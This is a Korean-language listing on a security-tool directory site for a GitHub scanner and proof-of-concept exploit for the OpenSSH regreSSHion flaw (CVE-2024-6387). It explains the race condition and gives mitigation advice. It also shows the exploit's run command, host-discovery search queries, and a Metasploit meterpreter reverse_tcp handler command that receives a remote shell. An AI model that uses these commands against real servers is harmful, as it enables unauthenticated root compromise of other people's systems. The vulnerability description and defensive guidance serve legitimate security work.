Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-6387 — OpenSSH 서버의 원격 인증되지 않은 코드 실행 취약점(CVE-2024-6387) | Kitploit
도구/GitHubGitHub/karmakstylez/cve-2024-6387
ReconnaissanceVulnerability ScannersExploitationNetwork SecurityPenetration TestingRemote Access Tool
GitHubkarmakstylez/cve-2024-6387

CVE-2024-6387

OpenSSH 서버의 원격 인증되지 않은 코드 실행 취약점(CVE-2024-6387)

저장소 보기
1884742년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

openssh CVE-2024-6387.py - PoC

중요 참고 사항!!!

이 익스플로잇은 32비트 OpenSSH 서버에서만 작동합니다. POC가 32비트 포인터를 사용하기 때문입니다! 또한 일부 버전은 이미 패치되었으며 모든 서버가 취약한 것은 아닙니다. 테스트 완료: Kali Linux, ParrotSec, Ubuntu 22.04

📜 설명

OpenSSH 서버의 원격 인증되지 않은 코드 실행 취약점

CVE-2024-6387.py는 최근 발견된 regreSSHion 취약점(CVE-2024-6387)을 대상으로, 취약한 OpenSSH 버전을 실행 중인 서버를 식별하도록 설계된 가볍고 효율적인 도구입니다. 이 스크립트는 여러 IP 주소, 도메인 이름 및 CIDR 네트워크 범위를 빠르게 스캔하여 잠재적 취약점을 탐지하고 인프라를 안전하게 보호할 수 있도록 합니다.

OpenSSH 서버(sshd)에서 신호 처리기 경쟁 조건이 발견되었습니다. 클라이언트가 LoginGraceTime 초(기본값 120, 이전 OpenSSH 버전에서는 600) 내에 인증하지 않으면 sshd의 SIGALRM 핸들러가 비동기적으로 호출됩니다. 그러나 이 신호 핸들러는 syslog()와 같이 비동기-신호-안전(async-signal-safe)하지 않은 다양한 함수를 호출합니다.

📁 목차

  • 📖 세부 정보
  • 🌟 기능
  • ⚙️ 사용법
  • O 출력
  • 🔍 호스트 발견
  • 🛠️ 완화
  • 💁 참고 자료
  • 📌 저자
  • 📢 면책 조항

✍🏻 세부 정보

기술적 세부 사항은 여기에서 확인할 수 있습니다.

이 결함은 2024년 5월 Qualys 연구원들이 발견했으며, 식별자 CVE-2024-6387이 할당되었습니다. 이는 sshd의 신호 처리기 경쟁 조건으로 인해 인증되지 않은 원격 공격자가 루트 권한으로 임의 코드를 실행할 수 있게 합니다.

"클라이언트가 LoginGraceTime 초(기본값 120) 내에 인증하지 않으면 sshd의 SIGALRM 핸들러가 비동기적으로 호출되어 async-signal-safe하지 않은 다양한 함수를 호출합니다."

"원격의 인증되지 않은 공격자는 이 결함을 이용하여 루트 권한으로 임의 코드를 실행할 수 있습니다."

🌟 기능

  • 빠른 스캔: 여러 IP 주소, 도메인 이름 및 CIDR 범위에서 CVE-2024-6387 취약점을 신속하게 스캔합니다.
  • 배너 검색: 인증 없이 SSH 배너를 효율적으로 검색합니다.
  • 대기 시간 감지: 선택적으로 LoginGraceTime 설정을 사용하여 서버가 취약점을 완화했는지 확인합니다.
  • IPv6 지원: 직접 및 호스트 이름 기반 스캔 모두에서 IPv6 주소를 완전히 지원합니다.
  • 멀티스레딩: 스레드를 사용하여 동시 검사를 수행하여 스캔 시간을 크게 단축합니다.
  • 상세 출력: 이모지로 구분된 명확한 스캔 결과 요약을 제공합니다.
  • 포트 확인: 닫힌 포트를 식별하고 응답하지 않는 호스트의 요약을 제공합니다.
  • 패치된 버전 감지: 알려진 패치된 버전을 인식하고 취약성 보고서에서 제외합니다.

⚙️ 사용법

OpenSSH 서버 스캔

요구 사항: python3 최신 버전

root@kitploit:~
### 명령줄 인수
mode: 작동 모드 선택. 선택지는 scan 또는 exploit입니다.
-T, --targets: IP 주소, 도메인 이름, IP 주소가 포함된 파일 경로 또는 CIDR 네트워크 범위.
-f, --outputfile: 결과를 저장할 파일(예: result.json).
-g, --gracetimecheck: 버전 식별 후 LoginGraceTime 완화 확인을 위해 대기할 시간(초)(기본값: 120초).
-n, --nic: 네트워크 NIC(기본값: 'eth0').
-o, --output: 결과 출력 형식(선택지: 'csv', 'txt', 'json').
-p, --port: 확인 또는 익스플로잇할 포트 번호(기본값: 22).
-s, --speed: 경쟁 조건 가능성을 높이기 위한 스레드 수(기본값: 10).
-t, --timeout: 연결 시간 제한(초)(기본값: 1초).
-H, --resolve-hostnames: 호스트 이름 확인

예제

단일 URL/IP 스캔

root@kitploit:~
python3 CVE-2024-6387.py scan -T example.com -p 22

하나의 도메인/IP에 대해 익스플로잇 실행

root@kitploit:~
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

권한 상승 과정

페이로드 수신

먼저 아래 명령을 실행하고({yourip} 핸들러 변경), 이후 위 명령으로 익스플로잇을 실행하면 됩니다.

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

출력

도구는 가독성을 위해 콘솔에 색상 코드 출력을 제공합니다:

  • 녹색: 성공적인 연결 또는 작업.
  • 빨간색: 실패한 연결 또는 오류.
  • 노란색: 경고 또는 주목할 만한 정보.
  • 청록색: 일반 정보 또는 상태 업데이트.

🔍 호스트 발견

  • Hunter: /product.name="OpenSSH"
  • FOFA: app="OpenSSH"
  • SHODAN: product:"OpenSSH"
  • CENSYS: (openssh) and labels=remote-access

🛠️ 완화

  • 패치 관리: OpenSSH에 사용 가능한 패치를 신속하게 적용하는 것이 취약점 간격을 좁히는 데 중요합니다. 적시에 패치를 적용하면 알려진 익스플로잇이 시스템에서 악용되는 것을 방지하여 공격자의 기회를 줄일 수 있습니다.

  • 향상된 접근 제어: 네트워크 기반 제어를 통해 SSH 접근을 제한하면 추가적인 방어 계층이 제공됩니다. 이 접근 방식은 SSH 연결을 승인된 네트워크나 IP 주소로만 제한하여 잠재적 공격자에 대한 노출을 최소화합니다. 방화벽 규칙 또는 VPN을 사용한 보안 접근과 같은 도구를 구현하면 이러한 제한을 효과적으로 적용할 수 있습니다.

  • 네트워크 분할: 네트워크를 세그먼트로 나누면 잠재적 침해의 영향을 제한하는 데 도움이 됩니다. 중요한 시스템과 민감한 데이터를 네트워크의 덜 중요한 부분과 분리함으로써 공격자의 측면 이동 위험을 줄일 수 있습니다. 이러한 분할은 엄격한 접근 제어 및 모니터링과 함께 사용하여 이러한 세그먼트를 침해하려는 무단 시도를 탐지하고 대응할 수 있습니다.

  • 침입 탐지 시스템(IDS): IDS 또는 침입 방지 시스템(IPS)을 배포하면 네트워크 트래픽과 시스템 로그를 실시간으로 모니터링할 수 있습니다. 이러한 시스템은 regreSSHion 취약점과 관련된 의심스러운 활동 및 잠재적 익스플로잇 시도를 탐지할 수 있습니다. 이러한 시스템에 의해 트리거된 경고는 심각한 손상이 발생하기 전에 신속한 조사와 완화를 가능하게 합니다.

  • 익스플로잇 시도 모니터링: 네트워크 및 시스템 로그를 지속적으로 모니터링하는 것이 중요합니다. OpenSSH 취약점을 익스플로잇하려는 시도를 나타낼 수 있는 비정상적인 패턴이나 활동을 찾으십시오. 이러한 사전 대응 방식은 위협이 피해를 입히기 전에 식별하고 대응하는 데 도움이 됩니다.

💁 참고 자료

  • 원저자: CVE-2024-6387 스캐너
  • 원저자: CVE-2024-6387 PoC

추가 참고 자료

  • http://www.openwall.com/lists/oss-security/2024/07/01/12
  • https://access.redhat.com/security/cve/CVE-2024-6387
  • https://bugzilla.redhat.com/show_bug.cgi?id=2294604
  • https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
  • https://github.com/zgzhang/cve-2024-6387-poc
  • https://ubuntu.com/security/CVE-2024-6387
  • https://ubuntu.com/security/notices/USN-6859-1
  • https://www.suse.com/security/cve/CVE-2024-6387.html
  • https://explore.alas.aws.amazon.com/CVE-2024-6387.html
  • https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
  • https://www.openssh.com/txt/release-9.8
  • https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
  • https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
  • https://www.theregister.com/2024/07/01/regresshion_openssh/
  • https://news.ycombinator.com/item?id=40843778

📢 면책 조항

  • 중요 사항:
    • 이 도구는 승인된 침투 테스트 및 레드 팀 훈련 목적으로만 개발 및 사용됩니다. glibc 기반 Linux 시스템의 OpenSSH 서버에서 취약점을 식별하고 익스플로잇하도록 설계되었습니다. 이 도구의 무단 사용은 엄격히 금지되며, 이 도구의 소유자는 도구의 무단 액세스 또는 악의적 사용에 대해 책임을 지지 않습니다.
  • 법적 고지:
    • 해당 소유자의 명시적 승인 없이 시스템이나 네트워크에서 이 도구를 무단으로 사용하는 것은 관련 법률 및 규정을 위반할 수 있습니다. 사용자는 사이버 보안 테스트 및 평가를 관리하는 법적 및 윤리적 기준을 준수할 책임이 있습니다.
도구 다운로드
  • https://security-tracker.debian.org/tracker/CVE-2024-6387
  • https://github.com/oracle/oracle-linux/issues/149
  • https://github.com/rapier1/hpn-ssh/issues/87
  • https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/
  • https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
  • http://www.openwall.com/lists/oss-security/2024/07/01/13
  • https://security.netapp.com/advisory/ntap-20240701-0001/